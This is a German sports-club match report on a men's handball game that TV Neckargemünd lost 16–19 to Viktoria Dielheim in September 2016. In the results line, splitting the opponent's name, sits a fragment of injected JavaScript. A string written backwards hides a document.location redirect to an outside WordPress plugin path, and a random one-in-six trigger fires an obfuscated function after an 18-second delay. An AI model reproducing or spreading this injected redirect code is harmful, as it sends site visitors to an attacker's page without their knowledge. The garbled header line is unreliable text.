1. Herren: Abwehrschlacht – unglücklich verloren

Spielbericht 25. September 2016: TV Neckargemünd    16 – 19  (9:9)   TV Viktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria Dielheim

Sonntagabend, 18:30. Es war bereits ein langer Tag für die Neckargemünder. Ab 13:00 wurden die Mannschaften der Handballabteilung durch den Vorstand der Öffentlichkeit vorgestellt. Man hatte das Rundenspiel der befreundeten Fußball Spvgg Neckargemünd gemeinsam angesehen und auch der A-Jugend applaudiert. Jetzt musste man selber ran. Der Gegner hieß Dielheim und war allseits bekannt.

Die gut gelaunte Mannschaft hatte in der vergangenen Woche ihre Abwehr trainiert. Sie wollte aus dem Ergebnis der letzten Woche gelernt haben. Zudem war heute, Dank kulinarischer Verköstigung, mit einem deutlichen „Mehr-als-gewohnt“ an Zuschauern zu rechnen. Viele Dank an dieser Stelle an die Familie Papst, für das riesige Engagement!

In der Kabine feuerte der Trainer die Mannschaft an, schwor sie auf eine gute Abwehrleistung ein: „Seid für Einander da!“

Der Chor aus dem Publikum sang bereits ab der ersten Minute. Keiner war sich dessen bewusst, was für eine Abwehrschlacht bevorstand.

Wie in der Kabine besprochen, führte ein einstudierter Spielzug bereits in der ersten Minute zum Torerfolg. 1:0 für den TVN. So hätte es weitergehen können!

Doch die Abwehrreihen standen auf beiden Seiten gut. Dahinter machten die Torleute ihren Job. Auf eine schnelle Mitte wurde beiderseits eher verzichtet. Oft flog der Ball, von einer Parade erbeutet, risikobehaftet zurück in Hände der Gegner. Zu groß war die Verlockung eines schnellen Tores. Denn aus den Standardsituationen ergab sich nur etwa alle 3,3 Minuten ein Tor.

Halbzeitstand 9:9.

Noch gab es nichts zu beklagen. Gerade die im ersten Spiel schwächelnde Abwehr, war auf Vordermann gebracht worden. Nur im Angriff schien es nicht recht klappen zu wollen. Bis zur 40. Minute hätte ein Engländer Freude daran gehabt, darauf zu wetten, wer das nächste Tor werfen würde. Plötzlich war die neue Regel: Ihr ein Tor, wir ein Tor. Ein paar technische Fehler im Angriff ließen die Gäste unerwartet in Führung gehen. Aus dem 11:11 wurde plötzlich ein 11:15 Rückstand.

Nun lief man dem Ergebnis hinterher. Trotz gelungener Abwehraktionen, gehaltener 7-Meter Würfe, gelang es schlicht nicht, das wieder in Kraft getretene Gesetz zu umgehen.

Trotz des klaren Ergebnisses, war es ein schönes, faires Spiel, angeleitet von souveränen Schiedsrichtern und begleitet von enthusiastischen Fans.

Danke für die gute Stimmung!

Endstand 16:19.

Im nächsten Heimspiel  am Samstag, 8.10.2016, 18:30 geht es gegen die Herren 2 aus Malschenberg, die den Gelbschwarzen das erstreiten der 2 Punkte erneut nicht leicht machen werden.